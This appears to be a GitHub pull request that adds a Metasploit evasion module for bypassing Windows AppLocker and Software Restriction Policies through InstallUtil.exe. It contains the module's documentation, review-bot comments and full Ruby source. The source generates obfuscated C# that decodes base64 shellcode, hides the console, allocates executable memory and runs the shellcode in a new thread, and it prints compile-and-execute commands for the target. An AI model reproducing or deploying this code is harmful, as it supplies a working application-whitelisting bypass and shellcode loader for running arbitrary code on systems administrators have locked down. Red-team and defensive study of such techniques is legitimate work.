Add evasion module applocker_evasion_install_util #11795

Merged: 18 commits merged on Jul 23, 2019
@@ -0,0 +1,9 @@
## Intro

This module is designed to evade solutions such as software restriction policies and Applocker.

software restriction policies

this is too vague

The main vector for this bypass is to use the trusted binary InstallUtil.exe in executing user supplied code.

## Vulnerable Application

This evasion will work on all versions of Windows that include .net versions 3.5 or greater (note: ensure the selected payload matches the target os architecture).
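Review bot: the Vulnerable Application section says the technique works with .NET 3.5 or greater, yet the module's printed instructions only give the `v4.0.30319` framework paths, so the doc should state that the compile and execute steps assume the 4.0 runtime is present on the target (or give the path for the 3.5 case). The doc also lacks the Options and Verification Steps sections that framework module docs normally carry: `FILENAME` (default `install_util.txt`) is undocumented, and the note about matching the payload to the target architecture belongs in the steps rather than in a parenthesis. On the quoted line, spell out that "software restriction policies" means the Windows Software Restriction Policies (SRP) feature, as the earlier comment asks, and use Microsoft's spelling "AppLocker".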
121 changes: 121 additions & 0 deletions modules/evasion/windows/applocker_evasion_install_util.rb
@@ -0,0 +1,121 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Evasion

def initialize(info={})
super(merge_info(info,
'Name' => 'applocker_evasion_install_util',
'Description' => %q{
This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies.
This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code.
},
'Author' =>
[
'Nick Tyrer <@NickTyrer>', # module development
'Casey Smith', # install_util bypass research
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' => [ ['Microsoft Windows', {}] ]
))

register_options([
OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])
])
end


def build_payload
esc = Rex::Text.encode_base64(payload.encoded)
end


def instructions
<<~HEREDOC

___________________________________________________________________________________________________________________________________________
| |
| Instructions |
|___________________________________________________________________________________________________________________________________________|
| |
| 1.Copy #{datastore['FILENAME']} to the target and execute: |
| 2.x86{ |
| Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} |
| Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe |
| } |
| x64{ |
| Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} |
| Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe |
| } |
|___________________________________________________________________________________________________________________________________________|
HEREDOC
end


def install_util
esc = build_payload
moda = Rex::Text.rand_text_alpha (3)
modb = Rex::Text.rand_text_alpha (3)
modc = Rex::Text.rand_text_alpha (3)
modd = Rex::Text.rand_text_alpha (3)
mode = Rex::Text.rand_text_alpha (3)
modf = Rex::Text.rand_text_alpha (3)
modg = Rex::Text.rand_text_alpha (3)
modh = Rex::Text.rand_text_alpha (3)
modi = Rex::Text.rand_text_alpha (3)
modj = Rex::Text.rand_text_alpha (3)
<<~HEREDOC
/*
#{instructions}
*/
using System;
namespace #{Rex::Text.rand_text_alpha 3}
{
public class #{Rex::Text.rand_text_alpha 3} { public static void Main() { } }
[System.ComponentModel.RunInstaller(true)]
public class #{Rex::Text.rand_text_alpha 3} : System.Configuration.Install.Installer
{
private static Int32 #{modh}=0x1000;
private static IntPtr #{modi}=(IntPtr)0x40;
private static UInt32 #{modj} = 0xFFFFFFFF;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
[System.Runtime.InteropServices.DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr #{modg}, int nCmdShow);
[System.Runtime.InteropServices.DllImport("Kernel32")]
private static extern IntPtr GetConsoleWindow();
const int #{modf} = 0;
public override void Uninstall(System.Collections.IDictionary s)
{
IntPtr #{modg};
#{modg} = GetConsoleWindow();
ShowWindow(#{modg}, #{modf});
string #{moda} = "#{esc}";
byte[] #{modb} = Convert.FromBase64String(#{moda});
byte[] #{modc} = #{modb};
IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, #{modh}, #{modi});
System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length);
IntPtr #{mode} = IntPtr.Zero;
WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), #{modj});
}
}
}
HEREDOC
end


def run
file_create(install_util)
print_status("#{instructions}")
end

end
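Review bot: `build_payload` assigns its result to a local `esc` that is never read, so the method returns the value only because a Ruby assignment evaluates to the assigned value; drop the assignment and return `Rex::Text.encode_base64(payload.encoded)` directly. The `'Name'` field should be a human-readable title rather than the module file name, and the `Description` should use Microsoft's spelling "AppLocker" and avoid second person ("will assist you"). Style: `Rex::Text.rand_text_alpha (3)` with a space before the parenthesis triggers a Ruby argument-parenthesis warning and should be `rand_text_alpha(3)`; `print_status("#{instructions}")` can be `print_status(instructions)`; the double blank lines between methods and the blank line before the final `end` will be flagged by rubocop's Layout/EmptyLines cop. In the generated C#, `byte[] #{modc} = #{modb};` copies a reference to the same array and can be removed along with the `modc` name.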